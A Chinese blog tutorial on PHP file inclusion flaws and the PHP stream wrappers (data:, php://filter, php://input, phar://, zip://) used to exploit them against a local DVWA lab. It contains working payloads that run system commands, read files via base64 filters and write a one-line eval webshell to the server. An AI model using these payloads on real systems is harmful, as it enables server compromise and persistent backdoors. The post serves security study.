PHP伪协议之文件包含漏洞分析利用

最新推荐文章于 2024-05-20 09:40:38 发布
最新推荐文章于 2024-05-20 09:40:38 发布
阅读量2.9k 收藏 41
点赞数 7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/110228864
版权

allow_url_fopen = On  &&  allow_url_include = Off     此时才可以触发本地文件包含漏洞

allow_url_fopen = On  &&  allow_url_include = On     此时才可以触发远程文件包含漏洞

allow_url_fopen一直都是默认开启的,而allow_url_include从PHP5.2之后就是默认关闭的了

include() 产生一个警告而 require() 则导致一个致命错误

include()包含不到文件时还是会继续运行脚本,而require()包含文本时却又没有这个文本就会终止运行脚本。

源码1:

<?php
$file = $_GET[ 'page' ];
include($file);
?>

分析:没有经过任何过滤,page参数可控,直接包含page参数的值。

源码2:

<?php 
$a=$_GET['page'];
$file =$a.'.php';
echo $file;
include($file);
 ?>

分析:可以看到固定了后缀名为.php,无论传入的参数是什么,都会再后面加上.php后缀名,导致无法成功的进行包含。

解决方法:使用%00截断

在PHP中使用%00:

1.PHP版本<5.3(不包括5.3);

2. PHP `magic_quotes_gpc = off`;

3.PHP不会在收到的参数中使用addslashes函数,例如上面代码中的$ _GET ['file'],不过在PHP版本5.3或更高版本中,此问题已得到解决。

远程文件包含:

条件:

1.在php.ini中需要allow_url_include = on和allow_url_fopen= on

2.所需的远程文件后缀不能与目标服务器的语言相同,如目标服务器解析PHP代码,则远程文件后缀不能为.php。(否则会加载远程主机的信息)

文件包含伪协议:

PHP内置了很多URL风格的封装协议,可用于类似fopen()、copy()、file_exists() 和 filesize()的文件系统函数。

常见文件包含函数:
include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file.

常见的伪协议:

php:// — 访问各个输入/输出流(I/O streams)

data:// — 数据(RFC 2397)

file:// — 访问本地文件系统

zlib:// — 压缩流

phar:// — PHP 归档

php://input(接收POST提交过来的值)

利用条件:

  1. allow_url_fopen=on 
  2. allow_url_include=on  
  3. php版本小于等于5.3.0

利用方式:

执行phpinfo();

getshell

php://filter

利用条件:

  1. allow_url_fopen=on
  2. allow_url_include没有要求

利用方式:

php://filter/read=convert.base64-encode/resource=./robots.txt

读取目标服务器文件内容,并讲这些内容进行base64编码,我们只需要解码就可以了。

data:text/plain
利用条件:

  1. allow_url_fopen=ON
  2. allow_url_include=ON
  3. php版本大于5.2

利用方式:

  1. data:text/plain,<?php phpinfo();?>
  2. data:text/plain,<?php system("whoami");?>
  3. data:text/plain,<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["s"]);?>');?>

查询信息:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data:text/plain,<?php phpinfo();?>

执行命令:

getshell:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data:text/plain,<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["s"]);?>');?>

查看目录,shell写入成功:

data:text/plain;base64,

利用方式:同data:text/plain,但是需要进行base64编码和url编码。

信息查询:

1,使用了data:text/plain;base64,但是没有进行base64加密,所以报错

2,进行第一次base64加密之后产生的加号+导致了报错

3,对加号进行url进行编码

命令执行:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==

 

phar://

phar://[压缩文件路径]/[压缩文件内的子文件名]

利用条件:

php版本大于等于5.3.0

利用方式:

利用思路:将一句话木马添加到压缩包2.zip中,然后将2.zip上传到目标服务器上。

使用:page=phar://2.zip/2.php

file:

利用条件:

对allow_url_fopen和allow_url_include不做要求

利用方式:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file://E:\phpstudy_pro\WWW\DVWA\vulnerabilities\fi\shy.txt

zip//

zip://[压缩文件路径]#[压缩文件内的子文件名]

利用思路:将一句话木马添加到压缩包1.zip中,然后将1.zip重命名成1.jpg上传到目标服务器上。

使用:zip://1.jpg%231.php 执行一句话木马

 

 

shy014
关注
  • 7
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞php协议
qq_46485934的博客
09-26 778
一.前情提要 本人在写buuctf的时候,碰到一道文件包含php协议的题目include 于是,我就想深入的了解一下PHP协议 二.文件包含函数 首先归纳下常见的文件包含函数:include,require,include_once,require_once,highlight_file,show_source,readfile,file_get_contents,fopen,file 三.协议 php协议php封装协议,这些协议常被CTF出题中与文件包含漏洞结合。这里做个小结,涉及的相关协议
php协议 文件包含,文件包含漏洞协议利用
weixin_33166692的博客
03-30 1017
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.协议利用file协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php协议,有两种类型 input 和 ...
关于php----phar协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2029
关于php----phar协议和phar文件反序列化漏洞利用phar(php archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
【安全】P 6 文件上传漏洞(手工+工具)绕过合集
Z_David_Z的博客
02-27 2733
目录0X01 绕过JS验证JS验证代码分析Burpsuite剔除响应JS浏览器审计工具剔除JS上传Webshell,菜刀连接0X02 绕过MIME-Type验证MIME-Type介绍验证MIME-Type代码分析Burpsuite绕过MIME-Type验证菜刀连接 虚拟终端功能0X03 绕过黑名单验证基于文件后缀名验证介绍基于黑名单验证代码分析Burpsuite绕过黑名单验证上传webshell菜刀连接0X04 绕过黑名单验证(.htaccess).htaccess文件介绍配置文件http.conf审计黑名
【网络安全篇】php协议-漏洞及其原理
最新发布
cc123489ll的博客
05-20 1000
🍁文件包含函数* * 🔥例题讲解。
文件包含漏洞
wutiangui的博客
07-07 825
php:// — 访问各个输入/输出流(I/O streams)不受allow_url_fopen和allow_url_include影响(filter需要4个参数)/usr/local/app/apache2/conf/httpd.conf //apache2配置文件。/usr/local/app/php5/lib/php.ini //php配置文件。/etc/httpd/conf/httpd.conf //apache配置文件。resoure=<要过滤的数据流> 必须参数,指定筛选过滤的数据流。
Web安全之PHP协议漏洞利用,以及协议漏洞防护方法
Scalzdp的专栏
11-13 2049
单纯看协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
php文件包含漏洞详解
weixin_61835841的博客
10-05 391
文件包含漏洞相关知识及复现
php协议.zipphp协议.zip
02-24
在提到的“php协议.docx”文件中,可能包含了更详细的关于PHP协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP协议来实现...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞PHP包含文件PHP包含文件PHP包含日志文件PHP截断包含;...
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
PHP代码审计小结1
08-03
3. **协议利用**:利用`php://input`、`data:`等协议,或通过ZIP/PHAR格式绕过限制。 #### 找回密码机制 1. **验证token**:找回密码过程中生成的token应安全存储,并在链接中有效使用。 2. **密码加密**:了解并...
xss漏洞,网站安全编程,黑客编程
02-07
1. 了解攻击手段:学习常见的攻击方法,如SQL注入、命令注入、文件包含等,以便及时发现并修复漏洞。 2. 安全架构设计:在系统设计阶段就考虑安全性,如使用安全的通信协议(HTTPS),分离敏感数据和非敏感数据。 ...
第十天文件包含漏洞 php协议
代码审计
03-15 4141
文件包含漏洞PHP中常见包含文件函数常见文件包含漏洞代码文件包含漏洞的危害文件包含漏洞的分类本地文件包含**1.上传图片马**2.读取网站源码以及配置文件远程文件包含 什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。 例如:include “conn.phpPHP中常见包含文件函数  include() 当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含
PHP协议
liwenqianye的博客
12-21 2761
文件包含协议 PHP内置了很多URL风格的封装协议,可用于类似fopen()、copy()、file_exists() 和 filesize()的文件系统函数。 常见文件包含函数: include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file. 常见的协议php:// — 访问各个输入/输出流(I/O streams) data:// —
各种文件用JS转Base64之后的data类型
qq_33226124的博客
06-22 873
1.txt data:text/plain;base64, 2.doc data:application/msword;base64, 3.docx data:application/vnd.openxmlformats-officedocument.wordprocessingml.document;base64, 4.xls data:application/vnd.ms-excel;base64, 5.xlsx data:application/vnd.open
data类型的Url格式及Base64编码:把小数据直接嵌入到Url中
weixin_30567225的博客
12-20 559
所谓"data"类型的Url格式,是在RFC2397中提出的,目的对于一些“小”的数据,可以在网页中直接嵌入,而不是从外部文件载入。例如对于img这个Tag,哪怕这个图片非常非常的小,小到只有一个点,也是要从另外一个外部的图片文件例如gif文件中读入的,如果浏览器实现了data类型的Url格式,这个文件就可以直接从页面文件内部读入了。 data类型的Url格式早在1998年就提出了,时至今日,F...
【拓展】868- 一文读懂base64
pingan8787
02-13 842
一、为什么要使用 base64我们知道一个字节可表示的范围是 0 ~ 255(十六进制:0x00 ~ 0xFF), 其中 ASCII 值的范围为 0 ~ 127(十六进制:0x00 ~ 0...
php文件包含漏洞利用phpinfo)
06-28
回答1:</h3><br/>PHP文件包含漏洞是一种常见的Web安全漏洞,攻击者可以利用漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值